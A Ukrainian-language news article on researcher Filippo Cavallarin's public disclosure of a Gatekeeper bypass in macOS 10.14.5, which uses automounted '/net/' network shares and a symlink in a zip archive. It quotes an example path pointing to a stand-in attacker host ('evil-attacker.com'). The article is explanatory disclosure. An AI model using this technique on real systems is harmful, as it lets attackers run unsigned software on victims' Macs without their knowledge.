Амайя Томан Дослідник безпеки Філіппо Кавалларін опублікував у своєму блозі попередження про помилку в macOS 10.14.5. Це полягає в можливості повністю обійти заходи безпеки Gatekeeper. За словами Кавалларіна, він вказував на помилку Apple ще в лютому цього року, але компанія не виправила її в останньому оновленні.
Gatekeeper було розроблено компанією Apple і вперше включено до її настільної операційної системи в 2012 році. Це механізм, який запобігає запуску програми без відома та згоди користувача. Після того, як ви завантажите програму, Gatekeeper автоматично перевірить її код, щоб переконатися, що програмне забезпечення правильно підписано Apple.
Це може бути зацікавити вас
У своїй публікації в блозі Кавалларін зазначає, що Gatekeeper за замовчуванням вважає як зовнішнє сховище, так і спільні мережеві місця безпечними місцями. Таким чином, будь-яка програма, яка знаходиться в цих цілях, може бути автоматично запущена без необхідності проходити перевірку Gatekeeper. Саме ця функція може бути використана для запуску шкідливого програмного забезпечення без відома користувача.
Одним із аспектів, який дозволяє неавторизований доступ, є функція автоматичного монтування, яка дозволяє користувачам автоматично монтувати спільний мережевий ресурс, просто вказавши шлях, що починається з "/net/". Як приклад Кавалларін наводить шлях «ls /net/evil-attacker.com/sharedfolder/», який може змусити операційну систему завантажити вміст папки «sharedfolder» у віддаленому місці, що може бути потенційно шкідливим.
Як працює загроза, дивіться на відео:
Іншим фактором є той факт, що якщо архів zip, який містить певне символічне посилання, що веде до функції автоматичного монтування, надається спільно, він не перевірятиметься Gatekeeper. Таким чином жертва може легко завантажити шкідливий архів і розпакувати його, дозволяючи зловмиснику запускати практично будь-яке програмне забезпечення на Mac без відома користувача. Finder, який за замовчуванням приховує певні розширення, також має свою частку цієї вразливості.
Кавалларін у своєму блозі заявляє, що Apple звернула увагу на вразливість операційної системи macOS 22 лютого цього року. Але в середині травня Apple перестала спілкуватися з Cavallarin, тому Cavallarin вирішив оприлюднити все.
Джерело: FCVL
